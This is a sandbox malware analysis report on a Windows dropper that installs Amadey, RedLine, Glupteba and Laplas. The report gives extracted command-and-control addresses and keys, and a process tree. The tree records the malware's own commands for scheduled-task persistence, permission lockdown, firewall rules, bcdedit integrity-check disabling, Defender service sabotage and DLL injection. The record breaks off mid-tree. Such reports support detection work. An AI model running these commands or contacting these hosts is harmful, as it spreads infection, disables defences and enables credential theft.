Analysis

  • max time kernel
    279s
  • max time network
    299s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    04-09-2023 01:24

General

  • Target

    t0793336.exe

  • Size

    315KB

  • MD5

    57f92b3fe4257b9b5e87bba5cd9d01d0

  • SHA1

    a2b08e8254efc9326f6d9b8370b22218ef3320e8

  • SHA256

    84567d4d000ee419bbaccd630c406f2029b88e42e1b67f6d1a670c974403df87

  • SHA512

    8c5bb901ae4c7434cb718699b55af3a2906ecef1165a201818300e3e10cbbe0e50117925a22709b9f425c31eef0fa1931bef27324c2155d2bd475919f4de49bb

  • SSDEEP

    6144:zR/tsQnf6X0M6+koYhXMxjwigfwfgbePu97rrAOQ322222KTq:zRlHVckoaXMxcePu97Hg22222iq

Malware Config

Extracted

Family

amadey

Version

3.87

C2

193.233.255.9/nasa/index.php

Attributes
  • install_dir

    ebb444342c

  • install_file

    legosa.exe

  • strings_key

    0b59a358b8646634fe523e0d5fe7fc43

rc4.plain

Extracted

Family

redline

C2

91.103.252.3:48665

Attributes
  • auth_value

    0c16e9e64d9b037e5f1ff9082d8f439f

Extracted

Family

redline

Botnet

10K

C2

77.232.38.234:80

Attributes
  • auth_value

    e0b9a8ef2c92da39d627d67103b3b93f

Extracted

Family

amadey

Version

3.83

C2

5.42.65.80/8bmeVwqx/index.php

Attributes
  • install_dir

    207aa4515d

  • install_file

    oneetx.exe

  • strings_key

    3e634dd0840c68ae2ced83c2be7bf0d4

rc4.plain

Extracted

Family

amadey

Version

3.88

C2

79.110.62.80/8bmeVwqx/index.php

Attributes
  • install_dir

    e8bff37b77

  • install_file

    yiueea.exe

  • strings_key

    dc58c693b6742b940cbf7234174a0f66

rc4.plain

Extracted

Family

laplas

C2

http://lpls.tuktuk.ug

Attributes
  • api_key

    a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Laplas Clipper

    Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 5 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 21 IoCs
  • Windows security bypass 2 TTPs 7 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
  • Modifies boot configuration data using bcdedit 14 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 5 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Uses the VBS compiler for execution 1 TTPs
  • Windows security modification 2 TTPs 7 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Manipulates WinMon driver. 1 IoCs

    Roottkits write to WinMon to hide PIDs from being detected.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 5 IoCs
  • Launches sc.exe 21 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 9 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 4 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 15 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    PID:1244
    • C:\Users\Admin\AppData\Local\Temp\t0793336.exe
      "C:\Users\Admin\AppData\Local\Temp\t0793336.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1384
      • C:\Users\Admin\AppData\Local\Temp\ebb444342c\legosa.exe
        "C:\Users\Admin\AppData\Local\Temp\ebb444342c\legosa.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2192
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legosa.exe /TR "C:\Users\Admin\AppData\Local\Temp\ebb444342c\legosa.exe" /F
          4⤵
          • Creates scheduled task(s)
          PID:2208
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legosa.exe" /P "Admin:N"&&CACLS "legosa.exe" /P "Admin:R" /E&&echo Y|CACLS "..\ebb444342c" /P "Admin:N"&&CACLS "..\ebb444342c" /P "Admin:R" /E&&Exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2724
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            5⤵
              PID:2792
            • C:\Windows\SysWOW64\cacls.exe
              CACLS "legosa.exe" /P "Admin:N"
              5⤵
                PID:2676
              • C:\Windows\SysWOW64\cacls.exe
                CACLS "legosa.exe" /P "Admin:R" /E
                5⤵
                  PID:2356
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  5⤵
                    PID:2628
                  • C:\Windows\SysWOW64\cacls.exe
                    CACLS "..\ebb444342c" /P "Admin:N"
                    5⤵
                      PID:2928
                    • C:\Windows\SysWOW64\cacls.exe
                      CACLS "..\ebb444342c" /P "Admin:R" /E
                      5⤵
                        PID:2656
                    • C:\Users\Admin\AppData\Local\Temp\1000139001\10c7b9izmah9.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000139001\10c7b9izmah9.exe"
                      4⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of WriteProcessMemory
                      PID:2556
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                        5⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3004
                    • C:\Users\Admin\AppData\Local\Temp\1000146001\pf3bv0f2aw4mj.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000146001\pf3bv0f2aw4mj.exe"
                      4⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of WriteProcessMemory
                      PID:2508
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                        5⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2612
                    • C:\Users\Admin\AppData\Local\Temp\1000147001\useyyoou_crypted.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000147001\useyyoou_crypted.exe"
                      4⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of WriteProcessMemory
                      PID:2256
                    • C:\Users\Admin\AppData\Local\Temp\1000155001\crypted158.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000155001\crypted158.exe"
                      4⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:1092
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                        5⤵
                          PID:1988
                      • C:\Users\Admin\AppData\Local\Temp\1000159001\rockas.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000159001\rockas.exe"
                        4⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of FindShellTrayWindow
                        PID:1832
                        • C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
                          "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
                          5⤵
                          • Executes dropped EXE
                          PID:1324
                      • C:\Users\Admin\AppData\Local\Temp\1000167001\rockas.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000167001\rockas.exe"
                        4⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of FindShellTrayWindow
                        PID:2400
                        • C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
                          "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
                          5⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:2380
                          • C:\Windows\SysWOW64\schtasks.exe
                            "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
                            6⤵
                            • Creates scheduled task(s)
                            PID:2272
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit
                            6⤵
                              PID:2028
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                7⤵
                                  PID:2428
                                • C:\Windows\SysWOW64\cacls.exe
                                  CACLS "oneetx.exe" /P "Admin:N"
                                  7⤵
                                    PID:696
                                  • C:\Windows\SysWOW64\cacls.exe
                                    CACLS "oneetx.exe" /P "Admin:R" /E
                                    7⤵
                                      PID:1544
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                      7⤵
                                        PID:1976
                                      • C:\Windows\SysWOW64\cacls.exe
                                        CACLS "..\207aa4515d" /P "Admin:N"
                                        7⤵
                                          PID:2252
                                        • C:\Windows\SysWOW64\cacls.exe
                                          CACLS "..\207aa4515d" /P "Admin:R" /E
                                          7⤵
                                            PID:2000
                                        • C:\Users\Admin\AppData\Local\Temp\1000438001\ss41.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1000438001\ss41.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Modifies system certificate store
                                          PID:1284
                                        • C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2508
                                          • C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:2148
                                          • C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:1080
                                          • C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:1772
                                          • C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:2264
                                          • C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:2780
                                        • C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe"
                                          6⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          • Checks whether UAC is enabled
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:1644
                                        • C:\Users\Admin\AppData\Local\Temp\1000439001\toolspub2.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1000439001\toolspub2.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:2104
                                          • C:\Users\Admin\AppData\Local\Temp\1000439001\toolspub2.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1000439001\toolspub2.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            • Checks SCSI registry key(s)
                                            • Suspicious behavior: MapViewOfSection
                                            PID:1724
                                        • C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe"
                                          6⤵
                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                          • Drops file in Drivers directory
                                          • Executes dropped EXE
                                          • Drops file in Program Files directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:2252
                                        • C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2272
                                          • C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:2904
                                          • C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:2464
                                          • C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:2348
                                          • C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:2420
                                          • C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:2792
                                        • C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe"
                                          6⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Adds Run key to start application
                                          • Checks whether UAC is enabled
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:1952
                                          • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
                                            C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
                                            7⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Checks whether UAC is enabled
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:2972
                                        • C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe"
                                          6⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          • Checks whether UAC is enabled
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:616
                                        • C:\Users\Admin\AppData\Local\Temp\1000440001\31839b57a4f11171d6abc8bbc4451ee4.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1000440001\31839b57a4f11171d6abc8bbc4451ee4.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2248
                                          • C:\Users\Admin\AppData\Local\Temp\1000440001\31839b57a4f11171d6abc8bbc4451ee4.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1000440001\31839b57a4f11171d6abc8bbc4451ee4.exe"
                                            7⤵
                                            • Windows security bypass
                                            • Executes dropped EXE
                                            • Windows security modification
                                            • Adds Run key to start application
                                            • Checks for VirtualBox DLLs, possible anti-VM trick
                                            • Drops file in Windows directory
                                            • Modifies data under HKEY_USERS
                                            PID:3160
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                              8⤵
                                                PID:3724
                                                • C:\Windows\system32\netsh.exe
                                                  netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                  9⤵
                                                  • Modifies Windows Firewall
                                                  • Modifies data under HKEY_USERS
                                                  PID:3748
                                              • C:\Windows\rss\csrss.exe
                                                C:\Windows\rss\csrss.exe
                                                8⤵
                                                • Drops file in Drivers directory
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                • Manipulates WinMon driver.
                                                • Manipulates WinMonFS driver.
                                                • Drops file in Windows directory
                                                • Modifies data under HKEY_USERS
                                                • Modifies system certificate store
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3784
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                  9⤵
                                                  • Creates scheduled task(s)
                                                  PID:3928
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks /delete /tn ScheduledUpdate /f
                                                  9⤵
                                                    PID:3952
                                                  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                                                    9⤵
                                                    • Executes dropped EXE
                                                    • Modifies system certificate store
                                                    PID:4004
                                                    • C:\Windows\system32\bcdedit.exe
                                                      C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                                                      10⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:1160
                                                    • C:\Windows\system32\bcdedit.exe
                                                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                                                      10⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:2056
                                                    • C:\Windows\system32\bcdedit.exe
                                                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                                                      10⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:300
                                                    • C:\Windows\system32\bcdedit.exe
                                                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
                                                      10⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:2720
                                                    • C:\Windows\system32\bcdedit.exe
                                                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
                                                      10⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:544
                                                    • C:\Windows\system32\bcdedit.exe
                                                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
                                                      10⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:1212
                                                    • C:\Windows\system32\bcdedit.exe
                                                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
                                                      10⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:2296
                                                    • C:\Windows\system32\bcdedit.exe
                                                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
                                                      10⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:1112
                                                    • C:\Windows\system32\bcdedit.exe
                                                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
                                                      10⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:1604
                                                    • C:\Windows\system32\bcdedit.exe
                                                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
                                                      10⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:1964
                                                    • C:\Windows\system32\bcdedit.exe
                                                      C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
                                                      10⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:2500
                                                    • C:\Windows\system32\bcdedit.exe
                                                      C:\Windows\system32\bcdedit.exe -timeout 0
                                                      10⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:2400
                                                    • C:\Windows\system32\bcdedit.exe
                                                      C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
                                                      10⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:1148
                                                  • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                                    C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                    9⤵
                                                    • Executes dropped EXE
                                                    PID:3076
                                                  • C:\Windows\system32\bcdedit.exe
                                                    C:\Windows\Sysnative\bcdedit.exe /v
                                                    9⤵
                                                    • Modifies boot configuration data using bcdedit
                                                    PID:1228
                                                  • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                                                    C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                                                    9⤵
                                                    • Executes dropped EXE
                                                    PID:2276
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                    9⤵
                                                    • Creates scheduled task(s)
                                                    PID:2332
                                                  • C:\Windows\windefender.exe
                                                    "C:\Windows\windefender.exe"
                                                    9⤵
                                                    • Executes dropped EXE
                                                    PID:1788
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                      10⤵
                                                        PID:764
                                                        • C:\Windows\SysWOW64\sc.exe
                                                          sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                          11⤵
                                                          • Launches sc.exe
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2752
                                                    • C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
                                                      C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
                                                      9⤵
                                                      • Executes dropped EXE
                                                      PID:3288
                                                      • C:\Windows\system32\schtasks.exe
                                                        schtasks /delete /tn "csrss" /f
                                                        10⤵
                                                          PID:3540
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /delete /tn "ScheduledUpdate" /f
                                                          10⤵
                                                            PID:3436
                                                  • C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2672
                                                    • C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:1932
                                                    • C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:1000
                                                    • C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:2196
                                                    • C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:1752
                                                    • C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:3040
                                                  • C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe"
                                                    6⤵
                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                    • Drops file in Drivers directory
                                                    • Executes dropped EXE
                                                    • Drops file in Program Files directory
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:1704
                                                  • C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe"
                                                    6⤵
                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                    • Drops file in Drivers directory
                                                    • Executes dropped EXE
                                                    • Drops file in Program Files directory
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:1656
                                              • C:\Users\Admin\AppData\Local\Temp\1000172001\Amadey.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1000172001\Amadey.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                PID:1312
                                                • C:\Users\Admin\AppData\Local\Temp\e8bff37b77\yiueea.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\e8bff37b77\yiueea.exe"
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:920
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\Admin\AppData\Local\Temp\e8bff37b77\yiueea.exe" /F
                                                    6⤵
                                                    • Creates scheduled task(s)
                                                    PID:2968
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "yiueea.exe" /P "Admin:N"&&CACLS "yiueea.exe" /P "Admin:R" /E&&echo Y|CACLS "..\e8bff37b77" /P "Admin:N"&&CACLS "..\e8bff37b77" /P "Admin:R" /E&&Exit
                                                    6⤵
                                                      PID:2932
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                        7⤵
                                                          PID:884
                                                        • C:\Windows\SysWOW64\cacls.exe
                                                          CACLS "yiueea.exe" /P "Admin:N"
                                                          7⤵
                                                            PID:2012
                                                          • C:\Windows\SysWOW64\cacls.exe
                                                            CACLS "yiueea.exe" /P "Admin:R" /E
                                                            7⤵
                                                              PID:1688
                                                            • C:\Windows\SysWOW64\cacls.exe
